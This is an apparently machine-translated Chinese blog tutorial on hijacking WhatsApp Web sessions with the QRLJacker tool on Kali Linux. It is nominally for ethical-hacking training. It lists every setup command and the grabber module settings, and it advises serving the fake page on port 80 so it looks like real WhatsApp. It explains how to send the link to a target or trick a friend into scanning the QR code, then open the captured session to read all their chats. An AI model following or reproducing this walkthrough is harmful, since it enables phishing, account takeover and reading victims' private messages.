- A+
所属分类:未分类
社交工程攻击仍然有效。 大多数攻击者都使用社交工程方法来欺骗目标。 根据国际网络安全研究所的道德黑客攻击研究员,社交工程方法被用于QRLJacker,这是一种用于获取应用程序网络会话的工具。 整个程序是用python编写的。 此工具的工作原理是网络钓鱼。 网络钓鱼是一种社交工程攻击,其中生成虚假登录页面或支付页面以收集用户的凭据。
QRLJacker是whatsapp会话劫持中最常用的工具,可以在测试的初始阶段提供帮助。
- 为了测试,我们使用了Live Kali Linux 2019.4 amd64 。 有时测试QrlJacker ,QRLJacker没有在安装版本的Kali linux上工作。 我们测试了Kali Linux 2018.4,2018.3和2019.1 amd64的 onLive启动。
- Geeko驱动程序充当Mozilla开发的应用程序中使用的Web浏览器引擎。 它在Selenium(一个python模块)和Mozilla浏览器之间创建了一个链接。 对于安装类型wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
- 键入tar -xvzf geckodriver-v0.24.0-linux64.tar.gz并将目录更改为已提取的目录。
- 输入sudo mv -f geckodriver / usr / local / share / geckodriver
- 输入sudo ln -s / usr / local / share / geckodriver / usr / local / bin / geckodriver
- 输入sudo ln -s / usr / local / share / geckodriver / usr / bin / geckodriver
- 记得要更新firefox浏览器。 对于那种类型sudo apt-get update & sudo apt-get install firefox-esr
- 输入apt-get install python3.7
- 输入git clone https://github.com/OWASP/QRLJacking
- 键入python3.7 -m pip install -r requirements.txt
- 输入python3.7 QrlJacker.py
_____________________________________ !\/ ! \/ ./ !/\ ! |\ ./ ! \ ! / \ ./ ! \______!______| \ ,/ ! /\ ! ./\ ,/ ! / \ ! | \ ,/ !/ \___!____| ,/ Everything is connected, even the simplest things! ! / \ _!__ *\,/ ! ! \ ! \,/ ! ! | \! ,/ !----------K/ ! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1 ! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh) ! / \ / | Loaded 1 grabber(s), 0 post module(s). !\./ \/ | !/\ / | ! \ / .o. ! \/ :O: ! / " ! / ! / !/ ! ! !
- 输入帮助
QrlJacker> 帮助
General commands ================= Command Description --------- ------------- help/? Show this help menu. os <command> Execute a system command without closing the framework banner Display banner. exit/quit Exit the framework. Core commands ============= Command Description --------- ------------- database Prints the core version, check if framework is up-to-date and update if you are not up-to-date. debug Drop into debug mode or disable it. (Making identifying problems easier) dev Drop into development mode or disable it. (Reload modules every use) verbose Drop into verbose mode or disable it. (Make framework displays more details) reload/refresh Reload the modules database.
- 键入列表和类型使用grabber / whatsapp
QrlJacker> 列表
名称描述
抓取器/ whatsapp Whatsapp QR会话抓取器和控制器
QrlJacker> 使用grabber / whatsapp
- 键入选项和类型设置端口1337
- 键入set host 192.168.1.7
QrlJacker模块(grabber / whatsapp)> 设置端口1337
[+] port => 1337
QrlJacker模块(grabber / whatsapp)> 设置主机192.168.1.7
[+] host => 192.168.1.7
QrlJacker模块(grabber / whatsapp)> 选项
名称当前值必需描述
1337港口是当地的港口。
host 192.168.1.7是要侦听的本地主机。
useragent(默认值)是使用useragent是(默认)one,(随机)生成的useragent或指定的useragent
输入run ,你也可以在端口80而不是1337上运行它,看起来像是whatsapp的真实页面
QrlJacker模块(grabber / whatsapp)> 运行
QrlJacker模块(grabber / whatsapp)>运行
[+]使用默认的useragent
[+]运行一个线程来保存QR图像[whatsapp]
[+]在whatsapp等待会议
[+]运行线程以在发生空闲时检测空闲,然后单击QR重新加载按钮[whatsapp]
[+]初始化网络服务器... [whatsapp]
- 启动Qrljacker服务器后。 您可以将此链接发送到您的目标。 为了测试,我们在Windows 7上打开了生成的QrlJacker代码。输入192.168.1.7:1337
- 对于使用情况,我们已在whatsapp 2.19.98上打开。 扫描手机Whatsapp网站中的二维码,或者让您的朋友使用社交工程技术登录whatsapp网站
- 转到你在Kali上开始QrlJacker的终端。 键入会话会话将显示已连接的Whats应用帐户到QrlJacker会话。
QrlJacker模块(grabber / whatsapp)> 会话
ID模块名称捕获
0 whatsapp Sat-Apr-13-04:53:03-2019
- 当您键入会话-i 0时 ,Kali Linux Web浏览器将以目标Whatsapp帐户打开首先它将打开web.whatsapp.com。
- 但在1或2秒后,Whatsapp账户将开启。
- 现在你可以看到whatsapp的所有聊天。
关于QrlJacking的实用视频: -
以上视频由印度德里国际网络安全研究所的一名道德黑客学生发布。 在Next发布中,我们将分析QRLJacker的工作原理
2019年4月16日